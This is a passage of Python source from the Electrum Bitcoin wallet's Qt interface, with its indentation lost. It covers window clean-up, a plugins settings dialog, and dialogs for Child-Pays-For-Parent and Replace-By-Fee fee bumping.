self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
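# Plugins are toggled live: do_toggle() loads or unloads the module and,
# for plugins that expose settings, lazily creates their settings widget
# in the grid's second column.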
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
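# Child Pays For Parent: the child's fee must cover the combined size of
# parent and child, so the proposed fee is fee-rate-per-kB * total_size.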
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
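# Replace-By-Fee bump: the wallet rebuilds the transaction with its fee
# raised by `delta`; ticking Final clears the RBF flag so the replacement
# cannot itself be bumped again.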
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s' % self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)